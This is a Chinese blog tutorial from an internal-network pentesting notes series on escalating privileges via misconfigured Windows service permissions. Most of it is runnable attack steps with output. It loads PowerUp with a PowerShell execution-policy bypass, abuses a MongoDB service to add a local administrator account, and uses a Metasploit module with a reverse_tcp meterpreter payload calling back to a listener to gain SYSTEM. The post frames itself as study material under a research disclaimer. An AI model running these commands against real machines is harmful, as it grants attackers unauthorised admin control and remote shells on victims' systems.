内网学习笔记 | 15、系统服务权限配置不当利用

admin
admin
admin
137461
文章
113
评论
2021年11月23日07:36:39评论75 views字数 2179阅读7分15秒阅读模式

PowerUp

PowerUp 可以用来寻找目标中权限配置不当的服务,下载地址:https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

在 PowerShell 中导入并执行脚本

Import-Module .PowerUp.ps1Invoke-AllChecks




如果 PowerShell 由于处在受限模式以至于无法导入脚本,可以使用以下命令绕过。


powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Invoke-AllChecks}"




PS C:UsersteamssixDesktop> powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Invoke-AllChecks}"
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...[+] User is in a local group that grants administrative privileges![+] Run a BypassUAC attack to elevate privileges to admin.
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
ServiceName    : MongoDBPath           : C:Webmongodbbinmongod.exe --auth --config C:Webmongodbmongod.conf --s                 erviceModifiableFile : C:Webmongodbmongod.confStartName      : LocalSystemAbuseFunction  : Install-ServiceBinary -ServiceName 'MongoDB'




由于结果可能比较长,因此也可以将其保存到 txt 文件里,方便查看


powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Invoke-AllChecks | Out-File -Encoding ASCII result.txt}"




从检查的结果可以看出 MongoDB 服务存在漏洞,利用 Install-ServiceBinary 模块,通过 PowerUp 利用该处权限配置不当添加管理员用户。


powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Install-ServiceBinary -ServiceName 'MongoDB' -UserName test -Password Passw0rd}"




PS C:UsersteamssixDesktop> powershell.exe -exec bypass -command "&{Import-Module .PowerUp.ps1;Install-ServiceBinary -ServiceName 'MongoDB' -UserName test -Password Passw0rd}"
ServiceName                   ServicePath                   Command                       BackupPath-----------                   -----------                   -------                       ----------MongoDB                       C:Webmongodbbinmongod...  net user test Passw0rd /ad... C:Webmongodbbinmongod...




重启系统,查看用户,发现 test 已经被添加到管理员组了。


PS C:UsersteamssixDesktop> net user test用户名                 test全名……本地组成员             *Administrators       *Users全局组成员             *None命令成功完成。




Metasploit


在 MSF 中,先看下已上线主机的权限


meterpreter > getuidServer username: TEAMSSIXdev




MSF 中对应服务权限配置不当的利用模块是 exploit/windows/local/service_permissions


利用步骤如下:


use exploit/windows/local/service_permissionsset payload windows/meterpreter/reverse_tcpset lhost 192.168.7.1set lport 4444set session 1run




内网学习笔记 | 15、系统服务权限配置不当利用



可以看到会话直接被提升到了 SYSTEM 权限。




原文链接:
https://teamssix.com/year/210722-173157.html


参考文章:


https://evi1cg.me/archives/Powerup.html






往期推荐


内网学习笔记 | 14、发现主机缺失补丁


内网学习笔记 | 13、内网中绕过无法上传文件限制


内网学习笔记 | 12、nps 的使用


内网学习笔记 | 15、系统服务权限配置不当利用







本文始发于微信公众号(TeamsSix):内网学习笔记 | 15、系统服务权限配置不当利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月23日07:36:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网学习笔记 | 15、系统服务权限配置不当利用https://cn-sec.com/archives/432316.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息